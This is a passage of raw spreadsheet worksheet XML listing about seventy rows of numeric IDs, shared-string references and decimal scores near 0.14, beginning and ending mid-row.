      <c r="C16813" s="2" t="s">
        <v>16215</v>
      </c>
      <c r="D16813" s="2">
        <v>1.0</v>
      </c>
      <c r="E16813" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16813" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16814" ht="15.75" customHeight="1">
      <c r="A16814" s="1">
        <v>31952.0</v>
      </c>
      <c r="B16814" s="2">
        <v>5310073.0</v>
      </c>
      <c r="C16814" s="2" t="s">
        <v>16216</v>
      </c>
      <c r="D16814" s="2">
        <v>1.0</v>
      </c>
      <c r="E16814" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16814" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16815" ht="15.75" customHeight="1">
      <c r="A16815" s="1">
        <v>6112.0</v>
      </c>
      <c r="B16815" s="2">
        <v>4.7769597E7</v>
      </c>
      <c r="C16815" s="2" t="s">
        <v>16217</v>
      </c>
      <c r="D16815" s="2">
        <v>1.0</v>
      </c>
      <c r="E16815" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16815" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16816" ht="15.75" customHeight="1">
      <c r="A16816" s="1">
        <v>8530.0</v>
      </c>
      <c r="B16816" s="2">
        <v>5.4102362E7</v>
      </c>
      <c r="C16816" s="2" t="s">
        <v>16218</v>
      </c>
      <c r="D16816" s="2">
        <v>1.0</v>
      </c>
      <c r="E16816" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16816" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16817" ht="15.75" customHeight="1">
      <c r="A16817" s="1">
        <v>14097.0</v>
      </c>
      <c r="B16817" s="2">
        <v>3.7745481E7</v>
      </c>
      <c r="C16817" s="2" t="s">
        <v>16219</v>
      </c>
      <c r="D16817" s="2">
        <v>1.0</v>
      </c>
      <c r="E16817" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16817" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16818" ht="15.75" customHeight="1">
      <c r="A16818" s="1">
        <v>14734.0</v>
      </c>
      <c r="B16818" s="2">
        <v>4.0685179E7</v>
      </c>
      <c r="C16818" s="2" t="s">
        <v>16220</v>
      </c>
      <c r="D16818" s="2">
        <v>1.0</v>
      </c>
      <c r="E16818" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16818" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16819" ht="15.75" customHeight="1">
      <c r="A16819" s="1">
        <v>19428.0</v>
      </c>
      <c r="B16819" s="2">
        <v>5.567834E7</v>
      </c>
      <c r="C16819" s="2" t="s">
        <v>16221</v>
      </c>
      <c r="D16819" s="2">
        <v>1.0</v>
      </c>
      <c r="E16819" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16819" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16820" ht="15.75" customHeight="1">
      <c r="A16820" s="1">
        <v>22217.0</v>
      </c>
      <c r="B16820" s="2">
        <v>3.2221311E7</v>
      </c>
      <c r="C16820" s="2" t="s">
        <v>16222</v>
      </c>
      <c r="D16820" s="2">
        <v>1.0</v>
      </c>
      <c r="E16820" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16820" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16821" ht="15.75" customHeight="1">
      <c r="A16821" s="1">
        <v>26802.0</v>
      </c>
      <c r="B16821" s="2">
        <v>1.8657895E7</v>
      </c>
      <c r="C16821" s="2" t="s">
        <v>16223</v>
      </c>
      <c r="D16821" s="2">
        <v>1.0</v>
      </c>
      <c r="E16821" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16821" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16822" ht="15.75" customHeight="1">
      <c r="A16822" s="1">
        <v>29442.0</v>
      </c>
      <c r="B16822" s="2">
        <v>3.222131E7</v>
      </c>
      <c r="C16822" s="2" t="s">
        <v>16224</v>
      </c>
      <c r="D16822" s="2">
        <v>1.0</v>
      </c>
      <c r="E16822" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16822" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16823" ht="15.75" customHeight="1">
      <c r="A16823" s="1">
        <v>31446.0</v>
      </c>
      <c r="B16823" s="2">
        <v>5026682.0</v>
      </c>
      <c r="C16823" s="2" t="s">
        <v>16225</v>
      </c>
      <c r="D16823" s="2">
        <v>1.0</v>
      </c>
      <c r="E16823" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16823" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="16824" ht="15.75" customHeight="1">
      <c r="A16824" s="1">
        <v>2277.0</v>
      </c>
      <c r="B16824" s="2">
        <v>3.2534693E7</v>
      </c>
      <c r="C16824" s="2" t="s">
        <v>16226</v>
      </c>
      <c r="D16824" s="2">
        <v>1.0</v>
      </c>
      <c r="E16824" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16824" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16825" ht="15.75" customHeight="1">
      <c r="A16825" s="1">
        <v>10002.0</v>
      </c>
      <c r="B16825" s="2">
        <v>5.7015548E7</v>
      </c>
      <c r="C16825" s="2" t="s">
        <v>16227</v>
      </c>
      <c r="D16825" s="2">
        <v>1.0</v>
      </c>
      <c r="E16825" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16825" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16826" ht="15.75" customHeight="1">
      <c r="A16826" s="1">
        <v>18510.0</v>
      </c>
      <c r="B16826" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C16826" s="2" t="s">
        <v>16228</v>
      </c>
      <c r="D16826" s="2">
        <v>1.0</v>
      </c>
      <c r="E16826" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16826" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16827" ht="15.75" customHeight="1">
      <c r="A16827" s="1">
        <v>21586.0</v>
      </c>
      <c r="B16827" s="2">
        <v>2.3904574E7</v>
      </c>
      <c r="C16827" s="2" t="s">
        <v>16229</v>
      </c>
      <c r="D16827" s="2">
        <v>1.0</v>
      </c>
      <c r="E16827" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16827" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16828" ht="15.75" customHeight="1">
      <c r="A16828" s="1">
        <v>22083.0</v>
      </c>
      <c r="B16828" s="2">
        <v>3.07156E7</v>
      </c>
      <c r="C16828" s="2" t="s">
        <v>16230</v>
      </c>
      <c r="D16828" s="2">
        <v>1.0</v>
      </c>
      <c r="E16828" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16828" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16829" ht="15.75" customHeight="1">
      <c r="A16829" s="1">
        <v>27957.0</v>
      </c>
      <c r="B16829" s="2">
        <v>2.3904573E7</v>
      </c>
      <c r="C16829" s="2" t="s">
        <v>16229</v>
      </c>
      <c r="D16829" s="2">
        <v>1.0</v>
      </c>
      <c r="E16829" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16829" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16830" ht="15.75" customHeight="1">
      <c r="A16830" s="1">
        <v>29179.0</v>
      </c>
      <c r="B16830" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C16830" s="2" t="s">
        <v>16230</v>
      </c>
      <c r="D16830" s="2">
        <v>1.0</v>
      </c>
      <c r="E16830" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16830" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16831" ht="15.75" customHeight="1">
      <c r="A16831" s="1">
        <v>29895.0</v>
      </c>
      <c r="B16831" s="2">
        <v>3607014.0</v>
      </c>
      <c r="C16831" s="2" t="s">
        <v>16231</v>
      </c>
      <c r="D16831" s="2">
        <v>1.0</v>
      </c>
      <c r="E16831" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16831" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16832" ht="15.75" customHeight="1">
      <c r="A16832" s="1">
        <v>31965.0</v>
      </c>
      <c r="B16832" s="2">
        <v>5312569.0</v>
      </c>
      <c r="C16832" s="2" t="s">
        <v>16232</v>
      </c>
      <c r="D16832" s="2">
        <v>1.0</v>
      </c>
      <c r="E16832" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16832" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="16833" ht="15.75" customHeight="1">
      <c r="A16833" s="1">
        <v>13437.0</v>
      </c>
      <c r="B16833" s="2">
        <v>3.510925E7</v>
      </c>
      <c r="C16833" s="2" t="s">
        <v>16233</v>
      </c>
      <c r="D16833" s="2">
        <v>1.0</v>
      </c>
      <c r="E16833" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16833" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="16834" ht="15.75" customHeight="1">
      <c r="A16834" s="1">
        <v>19772.0</v>
      </c>
      <c r="B16834" s="2">
        <v>5.6764616E7</v>
      </c>
      <c r="C16834" s="2" t="s">
        <v>16234</v>
      </c>
      <c r="D16834" s="2">
        <v>1.0</v>
      </c>
      <c r="E16834" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16834" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="16835" ht="15.75" customHeight="1">
      <c r="A16835" s="1">
        <v>23953.0</v>
      </c>
      <c r="B16835" s="2">
        <v>8907527.0</v>
      </c>
      <c r="C16835" s="2" t="s">
        <v>16235</v>
      </c>
      <c r="D16835" s="2">
        <v>1.0</v>
      </c>
      <c r="E16835" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16835" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="16836" ht="15.75" customHeight="1">
      <c r="A16836" s="1">
        <v>23040.0</v>
      </c>
      <c r="B16836" s="2">
        <v>5.0134748E7</v>
      </c>
      <c r="C16836" s="2" t="s">
        <v>16236</v>
      </c>
      <c r="D16836" s="2">
        <v>1.0</v>
      </c>
      <c r="E16836" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16836" s="2">
        <v>0.1424242424242425</v>
      </c>
    </row>
    <row r="16837" ht="15.75" customHeight="1">
      <c r="A16837" s="1">
        <v>20415.0</v>
      </c>
      <c r="B16837" s="2">
        <v>1.2228574E7</v>
      </c>
      <c r="C16837" s="2" t="s">
        <v>16237</v>
      </c>
      <c r="D16837" s="2">
        <v>1.0</v>
      </c>
      <c r="E16837" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16837" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="16838" ht="15.75" customHeight="1">
      <c r="A16838" s="1">
        <v>23839.0</v>
      </c>
      <c r="B16838" s="2">
        <v>8115742.0</v>
      </c>
      <c r="C16838" s="2" t="s">
        <v>16238</v>
      </c>
      <c r="D16838" s="2">
        <v>1.0</v>
      </c>
      <c r="E16838" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16838" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="16839" ht="15.75" customHeight="1">
      <c r="A16839" s="1">
        <v>25682.0</v>
      </c>
      <c r="B16839" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16839" s="2" t="s">
        <v>16239</v>
      </c>
      <c r="D16839" s="2">
        <v>1.0</v>
      </c>
      <c r="E16839" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16839" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="16840" ht="15.75" customHeight="1">
      <c r="A16840" s="1">
        <v>22847.0</v>
      </c>
      <c r="B16840" s="2">
        <v>4.6779819E7</v>
      </c>
      <c r="C16840" s="2" t="s">
        <v>16240</v>
      </c>
      <c r="D16840" s="2">
        <v>1.0</v>
      </c>
      <c r="E16840" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16840" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="16841" ht="15.75" customHeight="1">
      <c r="A16841" s="1">
        <v>11608.0</v>
      </c>
      <c r="B16841" s="2">
        <v>2.3039864E7</v>
      </c>
      <c r="C16841" s="2" t="s">
        <v>16241</v>
      </c>
      <c r="D16841" s="2">
        <v>1.0</v>
      </c>
      <c r="E16841" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16841" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="16842" ht="15.75" customHeight="1">
      <c r="A16842" s="1">
        <v>19358.0</v>
      </c>
      <c r="B16842" s="2">
        <v>5.5422529E7</v>
      </c>
      <c r="C16842" s="2" t="s">
        <v>16242</v>
      </c>
      <c r="D16842" s="2">
        <v>1.0</v>
      </c>
      <c r="E16842" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16842" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="16843" ht="15.75" customHeight="1">
      <c r="A16843" s="1">
        <v>25453.0</v>
      </c>
      <c r="B16843" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C16843" s="2" t="s">
        <v>16243</v>
      </c>
      <c r="D16843" s="2">
        <v>1.0</v>
      </c>
      <c r="E16843" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16843" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="16844" ht="15.75" customHeight="1">
      <c r="A16844" s="1">
        <v>20809.0</v>
      </c>
      <c r="B16844" s="2">
        <v>1.5330106E7</v>
      </c>
      <c r="C16844" s="2" t="s">
        <v>16244</v>
      </c>
      <c r="D16844" s="2">
        <v>1.0</v>
      </c>
      <c r="E16844" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16844" s="2">
        <v>0.1416275430359938</v>
      </c>
    </row>
    <row r="16845" ht="15.75" customHeight="1">
      <c r="A16845" s="1">
        <v>24893.0</v>
      </c>
      <c r="B16845" s="2">
        <v>1.2271924E7</v>
      </c>
      <c r="C16845" s="2" t="s">
        <v>16245</v>
      </c>
      <c r="D16845" s="2">
        <v>1.0</v>
      </c>
      <c r="E16845" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16845" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="16846" ht="15.75" customHeight="1">
      <c r="A16846" s="1">
        <v>12417.0</v>
      </c>
      <c r="B16846" s="2">
        <v>2.9118858E7</v>
      </c>
      <c r="C16846" s="2" t="s">
        <v>16246</v>
      </c>
      <c r="D16846" s="2">
        <v>1.0</v>
      </c>
      <c r="E16846" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16846" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="16847" ht="15.75" customHeight="1">
      <c r="A16847" s="1">
        <v>15732.0</v>
      </c>
      <c r="B16847" s="2">
        <v>4.4064182E7</v>
      </c>
      <c r="C16847" s="2" t="s">
        <v>16247</v>
      </c>
      <c r="D16847" s="2">
        <v>1.0</v>
      </c>
      <c r="E16847" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16847" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="16848" ht="15.75" customHeight="1">
      <c r="A16848" s="1">
        <v>25278.0</v>
      </c>
      <c r="B16848" s="2">
        <v>1.339492E7</v>
      </c>
      <c r="C16848" s="2" t="s">
        <v>16248</v>
      </c>
      <c r="D16848" s="2">
        <v>1.0</v>
      </c>
      <c r="E16848" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16848" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="16849" ht="15.75" customHeight="1">
      <c r="A16849" s="1">
        <v>26032.0</v>
      </c>
      <c r="B16849" s="2">
        <v>1.5404599E7</v>
      </c>
      <c r="C16849" s="2" t="s">
        <v>16249</v>
      </c>
      <c r="D16849" s="2">
        <v>1.0</v>
      </c>
      <c r="E16849" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16849" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="16850" ht="15.75" customHeight="1">
      <c r="A16850" s="1">
        <v>26040.0</v>
      </c>
      <c r="B16850" s="2">
        <v>1.5452794E7</v>
      </c>
      <c r="C16850" s="2" t="s">
        <v>16250</v>
      </c>
      <c r="D16850" s="2">
        <v>1.0</v>
      </c>
      <c r="E16850" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16850" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="16851" ht="15.75" customHeight="1">
      <c r="A16851" s="1">
        <v>26131.0</v>
      </c>
      <c r="B16851" s="2">
        <v>1.5937158E7</v>
      </c>
      <c r="C16851" s="2" t="s">
        <v>16251</v>
      </c>
      <c r="D16851" s="2">
        <v>1.0</v>
      </c>
      <c r="E16851" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16851" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="16852" ht="15.75" customHeight="1">
      <c r="A16852" s="1">
        <v>28131.0</v>
      </c>
      <c r="B16852" s="2">
        <v>2.4724821E7</v>
      </c>
      <c r="C16852" s="2" t="s">
        <v>16252</v>
      </c>
      <c r="D16852" s="2">
        <v>1.0</v>
      </c>
      <c r="E16852" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16852" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="16853" ht="15.75" customHeight="1">
      <c r="A16853" s="1">
        <v>1500.0</v>
      </c>
      <c r="B16853" s="2">
        <v>2.7242894E7</v>
      </c>
      <c r="C16853" s="2" t="s">
        <v>16253</v>
      </c>
      <c r="D16853" s="2">
        <v>1.0</v>
      </c>
      <c r="E16853" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16853" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="16854" ht="15.75" customHeight="1">
      <c r="A16854" s="1">
        <v>24389.0</v>
      </c>
      <c r="B16854" s="2">
        <v>1.0783157E7</v>
      </c>
      <c r="C16854" s="2" t="s">
        <v>16254</v>
      </c>
      <c r="D16854" s="2">
        <v>1.0</v>
      </c>
      <c r="E16854" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16854" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="16855" ht="15.75" customHeight="1">
      <c r="A16855" s="1">
        <v>33199.0</v>
      </c>
      <c r="B16855" s="2">
        <v>7163000.0</v>
      </c>
      <c r="C16855" s="2" t="s">
        <v>16255</v>
      </c>
      <c r="D16855" s="2">
        <v>1.0</v>
      </c>
      <c r="E16855" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16855" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="16856" ht="15.75" customHeight="1">
      <c r="A16856" s="1">
        <v>21585.0</v>
      </c>
      <c r="B16856" s="2">
        <v>2.3903894E7</v>
      </c>
      <c r="C16856" s="2" t="s">
        <v>16256</v>
      </c>
      <c r="D16856" s="2">
        <v>1.0</v>
      </c>
      <c r="E16856" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16856" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="16857" ht="15.75" customHeight="1">
      <c r="A16857" s="1">
        <v>26389.0</v>
      </c>
      <c r="B16857" s="2">
        <v>1.7000246E7</v>
      </c>
      <c r="C16857" s="2" t="s">
        <v>16257</v>
      </c>
      <c r="D16857" s="2">
        <v>1.0</v>
      </c>
      <c r="E16857" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16857" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="16858" ht="15.75" customHeight="1">
      <c r="A16858" s="1">
        <v>25711.0</v>
      </c>
      <c r="B16858" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C16858" s="2" t="s">
        <v>16258</v>
      </c>
      <c r="D16858" s="2">
        <v>1.0</v>
      </c>
      <c r="E16858" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16858" s="2">
        <v>0.1409465020576132</v>
      </c>
    </row>
    <row r="16859" ht="15.75" customHeight="1">
      <c r="A16859" s="1">
        <v>3050.0</v>
      </c>
      <c r="B16859" s="2">
        <v>3.6506077E7</v>
      </c>
      <c r="C16859" s="2" t="s">
        <v>16259</v>
      </c>
      <c r="D16859" s="2">
        <v>1.0</v>
      </c>
      <c r="E16859" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16859" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16860" ht="15.75" customHeight="1">
      <c r="A16860" s="1">
        <v>6992.0</v>
      </c>
      <c r="B16860" s="2">
        <v>5.0073692E7</v>
      </c>
      <c r="C16860" s="2" t="s">
        <v>16260</v>
      </c>
      <c r="D16860" s="2">
        <v>1.0</v>
      </c>
      <c r="E16860" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16860" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16861" ht="15.75" customHeight="1">
      <c r="A16861" s="1">
        <v>12403.0</v>
      </c>
      <c r="B16861" s="2">
        <v>2.8978656E7</v>
      </c>
      <c r="C16861" s="2" t="s">
        <v>16261</v>
      </c>
      <c r="D16861" s="2">
        <v>1.0</v>
      </c>
      <c r="E16861" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16861" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16862" ht="15.75" customHeight="1">
      <c r="A16862" s="1">
        <v>14460.0</v>
      </c>
      <c r="B16862" s="2">
        <v>3.9459757E7</v>
      </c>
      <c r="C16862" s="2" t="s">
        <v>16262</v>
      </c>
      <c r="D16862" s="2">
        <v>1.0</v>
      </c>
      <c r="E16862" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16862" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16863" ht="15.75" customHeight="1">
      <c r="A16863" s="1">
        <v>20622.0</v>
      </c>
      <c r="B16863" s="2">
        <v>1.4037373E7</v>
      </c>
      <c r="C16863" s="2" t="s">
        <v>16263</v>
      </c>
      <c r="D16863" s="2">
        <v>1.0</v>
      </c>
      <c r="E16863" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16863" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16864" ht="15.75" customHeight="1">
      <c r="A16864" s="1">
        <v>23751.0</v>
      </c>
      <c r="B16864" s="2">
        <v>7454536.0</v>
      </c>
      <c r="C16864" s="2" t="s">
        <v>16264</v>
      </c>
      <c r="D16864" s="2">
        <v>1.0</v>
      </c>
      <c r="E16864" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16864" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16865" ht="15.75" customHeight="1">
      <c r="A16865" s="1">
        <v>23939.0</v>
      </c>
      <c r="B16865" s="2">
        <v>8788012.0</v>
      </c>
      <c r="C16865" s="2" t="s">
        <v>16265</v>
      </c>
      <c r="D16865" s="2">
        <v>1.0</v>
      </c>
      <c r="E16865" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16865" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16866" ht="15.75" customHeight="1">
      <c r="A16866" s="1">
        <v>27313.0</v>
      </c>
      <c r="B16866" s="2">
        <v>2.1366991E7</v>
      </c>
      <c r="C16866" s="2" t="s">
        <v>16266</v>
      </c>
      <c r="D16866" s="2">
        <v>1.0</v>
      </c>
      <c r="E16866" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16866" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16867" ht="15.75" customHeight="1">
      <c r="A16867" s="1">
        <v>29448.0</v>
      </c>
      <c r="B16867" s="2">
        <v>3.222131E7</v>
      </c>
      <c r="C16867" s="2" t="s">
        <v>16267</v>
      </c>
      <c r="D16867" s="2">
        <v>1.0</v>
      </c>
      <c r="E16867" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16867" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16868" ht="15.75" customHeight="1">
      <c r="A16868" s="1">
        <v>30289.0</v>
      </c>
      <c r="B16868" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C16868" s="2" t="s">
        <v>16268</v>
      </c>
      <c r="D16868" s="2">
        <v>1.0</v>
      </c>
      <c r="E16868" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16868" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16869" ht="15.75" customHeight="1">
      <c r="A16869" s="1">
        <v>31913.0</v>
      </c>
      <c r="B16869" s="2">
        <v>5301249.0</v>
      </c>
      <c r="C16869" s="2" t="s">
        <v>16269</v>
      </c>
      <c r="D16869" s="2">
        <v>1.0</v>
      </c>
      <c r="E16869" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16869" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="16870" ht="15.75" customHeight="1">
      <c r="A16870" s="1">
        <v>13722.0</v>
      </c>
      <c r="B16870" s="2">
        <v>3.6345402E7</v>
      </c>
      <c r="C16870" s="2" t="s">
        <v>16270</v>
      </c>
      <c r="D16870" s="2">
        <v>1.0</v>
      </c>
      <c r="E16870" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16870" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="16871" ht="15.75" customHeight="1">
      <c r="A16871" s="1">
        <v>21437.0</v>
      </c>
      <c r="B16871" s="2">
        <v>2.2199622E7</v>
      </c>
      <c r="C16871" s="2" t="s">
        <v>16271</v>
      </c>
      <c r="D16871" s="2">
        <v>1.0</v>
      </c>
      <c r="E16871" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16871" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="16872" ht="15.75" customHeight="1">
      <c r="A16872" s="1">
        <v>22379.0</v>
      </c>
      <c r="B16872" s="2">
        <v>3.5113689E7</v>
      </c>
      <c r="C16872" s="2" t="s">
        <v>16272</v>
      </c>
      <c r="D16872" s="2">
        <v>1.0</v>
      </c>
      <c r="E16872" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16872" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="16873" ht="15.75" customHeight="1">
      <c r="A16873" s="1">
        <v>25363.0</v>
      </c>
      <c r="B16873" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C16873" s="2" t="s">
        <v>16273</v>
      </c>
      <c r="D16873" s="2">
        <v>1.0</v>
      </c>
      <c r="E16873" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16873" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="16874" ht="15.75" customHeight="1">
      <c r="A16874" s="1">
        <v>29795.0</v>
      </c>
      <c r="B16874" s="2">
        <v>3.5113688E7</v>
      </c>
      <c r="C16874" s="2" t="s">
        <v>16272</v>
      </c>
      <c r="D16874" s="2">
        <v>1.0</v>
      </c>
      <c r="E16874" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16874" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="16875" ht="15.75" customHeight="1">
      <c r="A16875" s="1">
        <v>32524.0</v>
      </c>
      <c r="B16875" s="2">
        <v>5731183.0</v>
      </c>
      <c r="C16875" s="2" t="s">
        <v>16274</v>
      </c>
      <c r="D16875" s="2">
        <v>1.0</v>
      </c>
      <c r="E16875" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16875" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="16876" ht="15.75" customHeight="1">
      <c r="A16876" s="1">
        <v>14604.0</v>
      </c>
      <c r="B16876" s="2">
        <v>4.0240314E7</v>
      </c>
      <c r="C16876" s="2" t="s">
        <v>16275</v>
      </c>
      <c r="D16876" s="2">
        <v>1.0</v>
      </c>
      <c r="E16876" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16876" s="2">
        <v>0.1406810035842294</v>
      </c>
    </row>
    <row r="16877" ht="15.75" customHeight="1">
      <c r="A16877" s="1">
        <v>15329.0</v>
      </c>
      <c r="B16877" s="2">
        <v>4.2551615E7</v>
      </c>
      <c r="C16877" s="2" t="s">
        <v>16276</v>
      </c>
      <c r="D16877" s="2">
        <v>1.0</v>
      </c>
      <c r="E16877" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16877" s="2">
        <v>0.1406810035842294</v>
      </c>
    </row>
    <row r="16878" ht="15.75" customHeight="1">
      <c r="A16878" s="1">
        <v>31387.0</v>
      </c>
      <c r="B16878" s="2">
        <v>4998248.0</v>
      </c>
      <c r="C16878" s="2" t="s">
        <v>16277</v>
      </c>
      <c r="D16878" s="2">
        <v>1.0</v>
      </c>
      <c r="E16878" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16878" s="2">
        <v>0.1406810035842294</v>
      </c>
    </row>
    <row r="16879" ht="15.75" customHeight="1">
      <c r="A16879" s="1">
        <v>22170.0</v>
      </c>
      <c r="B16879" s="2">
        <v>3.1612982E7</v>
      </c>
      <c r="C16879" s="2" t="s">
        <v>16278</v>
      </c>
      <c r="D16879" s="2">
        <v>1.0</v>
      </c>
      <c r="E16879" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16879" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="16880" ht="15.75" customHeight="1">
      <c r="A16880" s="1">
        <v>34171.0</v>
      </c>
      <c r="B16880" s="2">
        <v>9926840.0</v>
      </c>
      <c r="C16880" s="2" t="s">
